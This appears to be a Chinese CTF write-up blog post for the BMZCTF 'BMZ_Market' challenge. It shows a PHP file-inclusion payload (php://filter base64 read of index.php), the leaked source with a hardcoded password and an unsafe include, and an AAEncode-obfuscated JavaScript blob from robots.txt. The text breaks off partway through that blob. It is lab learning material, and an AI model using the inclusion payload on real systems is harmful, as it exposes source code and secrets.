chaser's Blog
0%

BMZCTF WP

发表于 更新于 分类于

综合渗透

BMZ_Market

打开环境

查看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="BMZ Market">
    <meta name="author" content="bmz">

    <title>BMZ Market</title>


    <link href="bootstrap.css" rel="stylesheet">

    
    <link href="covers.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">BMZ Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          
            Believe in yourself, you can find the flag
                    </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Power by<a href="#">@kuaile</a></p>
        </div>
      </footer>
    </div>



  

</body></html>

注意到注释处?lang=fr,印象中以前在哪见过这种东西,应该是文件包含,拼接到url访问,与原页面内容没太多变化,修改为lang=cn,发现报错

查看index.php内容

1
2
3
4
5
6
7
8
9
10
11
12
13
GET /?lang=php://filter/convert.base64-encode/resource=index HTTP/1.1
Host: www.bmzclub.cn:21490
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ca99f077-3758-40ca-802a-0b8afbf5b9e7; Hm_lvt_d7a3b863d5a302676afbe86b11339abd=1612590588,1612590698; Hm_lpvt_d7a3b863d5a302676afbe86b11339abd=1612590698; PHPSESSID=r8hvjhmrvbjjcp8sbov7pmm2p0
Connection: close


base64解码之后得到index.php内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<?php
$password ="Nevergiveup135." ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="BMZ Market">
    <meta name="author" content="bmz">

    <title>BMZ Market</title>


    <link href="bootstrap.css" rel="stylesheet">

    
    <link href="covers.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">BMZ Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          <?php
            if (isset($_GET['lang']))
          {
          echo $message;
          }
          else
          {
            ?>

            Believe in yourself, you can find the flag
            <?php
          }
?>
        </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Power by<a href="#">@kuaile</a></p>
        </div>
      </footer>
    </div>



  

</body></html>

目录暴破得到以下内容,在admin和backup都没什么发现,也不存在对应的php文件

查看robots.txt

1
776fz4nvvp/vvok9IC/vvYDvvY3CtO+8ie++iSB+4pS74pSB4pS7ICAgLy8qwrTiiIfvvYAqLyBbJ18nXTsgbz0o776f772w776fKSAgPV89MzsgYz0o776fzpjvvp8pID0o776f772w776fKS0o776f772w776fKTsgKO++n9CU776fKSA9KO++n86Y776fKT0gKG9eX15vKS8gKG9eX15vKTso776f0JTvvp8pPXvvvp/OmO++nzogJ18nICzvvp/Pie++n+++iSA6ICgo776fz4nvvp/vvok9PTMpICsnXycpIFvvvp/OmO++n10gLO++n++9sO++n+++iSA6KO++n8+J776f776JKyAnXycpW29eX15vIC0o776fzpjvvp8pXSAs776f0JTvvp/vvok6KCjvvp/vvbDvvp89PTMpICsnXycpW+++n++9sO++n10gfTsgKO++n9CU776fKSBb776fzpjvvp9dID0oKO++n8+J776f776JPT0zKSArJ18nKSBbY15fXm9dOyjvvp/QlO++nykgWydjJ10gPSAoKO++n9CU776fKSsnXycpIFsgKO++n++9sO++nykrKO++n++9sO++nyktKO++n86Y776fKSBdOyjvvp/QlO++nykgWydvJ10gPSAoKO++n9CU776fKSsnXycpIFvvvp/OmO++n107KO++n2/vvp8pPSjvvp/QlO++nykgWydjJ10rKO++n9CU776fKSBbJ28nXSso776fz4nvvp/vvokgKydfJylb776fzpjvvp9dKyAoKO++n8+J776f776JPT0zKSArJ18nKSBb776f772w776fXSArICgo776f0JTvvp8pICsnXycpIFso776f772w776fKSso776f772w776fKV0rICgo776f772w776fPT0zKSArJ18nKSBb776fzpjvvp9dKygo776f772w776fPT0zKSArJ18nKSBbKO++n++9sO++nykgLSAo776fzpjvvp8pXSso776f0JTvvp8pIFsnYyddKygo776f0JTvvp8pKydfJykgWyjvvp/vvbDvvp8pKyjvvp/vvbDvvp8pXSsgKO++n9CU776fKSBbJ28nXSsoKO++n++9sO++nz09MykgKydfJykgW+++n86Y776fXTso776f0JTvvp8pIFsnXyddID0ob15fXm8pIFvvvp9v776fXSBb776fb+++n107KO++n861776fKT0oKO++n++9sO++nz09MykgKydfJykgW+++n86Y776fXSsgKO++n9CU776fKSAu776f0JTvvp/vvokrKCjvvp/QlO++nykrJ18nKSBbKO++n++9sO++nykgKyAo776f772w776fKV0rKCjvvp/vvbDvvp89PTMpICsnXycpIFtvXl9ebyAt776fzpjvvp9dKygo776f772w776fPT0zKSArJ18nKSBb776fzpjvvp9dKyAo776fz4nvvp/vvokgKydfJykgW+++n86Y776fXTsgKO++n++9sO++nykrPSjvvp/OmO++nyk7ICjvvp/QlO++nylb776fzrXvvp9dPSdcXCc7ICjvvp/QlO++nyku776fzpjvvp/vvok9KO++n9CU776fKyDvvp/vvbDvvp8pW29eX15vIC0o776fzpjvvp8pXTsob+++n++9sO++n28pPSjvvp/Pie++n+++iSArJ18nKVtjXl9eb107KO++n9CU776fKSBb776fb+++n109J1wiJzso776f0JTvvp8pIFsnXyddICggKO++n9CU776fKSBbJ18nXSAo776fzrXvvp8rKO++n9CU776fKVvvvp9v776fXSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICjvvp/OmO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f772w776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICgob15fXm8pIC0gKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgob15fXm8pICsob15fXm8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776f772w776fKSsgKChvXl9ebykgLSAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKGNeX15vKSsgKG9eX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrIChjXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAo776fzpjvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f772w776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKChvXl9ebykgKyhvXl9ebykpKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/vvbDvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKGNeX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776f772w776fKSsgKGNeX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgob15fXm8pIC0gKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAo776fzpjvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKG9eX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrIChvXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKChvXl9ebykgKyhvXl9ebykpKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgob15fXm8pICsob15fXm8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAo776f772w776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n++9sO++nykrIChjXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKO++n++9sO++nykrICgob15fXm8pICsob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n++9sO++nykrIChjXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgob15fXm8pICsob15fXm8pKSsgKO++n++9sO++nykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICgo776f772w776fKSArIChvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICjvvp/vvbDvvp8pKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrIChvXl9ebykrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/OmO++nykrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776fzpjvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/vvbDvvp8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAo776f772w776fKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoY15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776fzpjvvp8pKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n86Y776fKSsgKO++n9CU776fKVvvvp/Ote++n10rKO++n86Y776fKSsgKChvXl9ebykgKyhvXl9ebykpKyAob15fXm8pKyAo776f0JTvvp8pW+++n861776fXSso776f772w776fKSsgKGNeX15vKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKChvXl9ebykgKyhvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArIChvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKO++n++9sO++nykgKyAob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgob15fXm8pICsob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgob15fXm8pICsob15fXm8pKSsgKO++n9CU776fKVvvvp/Ote++n10rKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICgo776f772w776fKSArIChvXl9ebykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKCjvvp/vvbDvvp8pICsgKO++n86Y776fKSkrICjvvp/QlO++nylb776fzrXvvp9dKygo776f772w776fKSArICjvvp/OmO++nykpKyAoKG9eX15vKSArKG9eX15vKSkrICjvvp/QlO++nylb776fzrXvvp9dKyjvvp/vvbDvvp8pKyAoKG9eX15vKSAtICjvvp/OmO++nykpKyAo776f0JTvvp8pW+++n861776fXSsoKO++n++9sO++nykgKyAo776fzpjvvp8pKSsgKO++n86Y776fKSsgKO++n9CU776fKVvvvp9v776fXSkgKO++n86Y776fKSkgKCdfJyk7

看起来很是base系列编码,但是没看到=,就觉得不是base64,在这纠结了好久,最终也没发现别的什么编码或者加密之后长这样,看了wp发现,真就是base64。。。

解码得到

1
2
 
゚ω゚ノ= /`m´)ノ ~┻━┻   //*´∇`*/ ['_']; o=(゚ー゚)  =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + 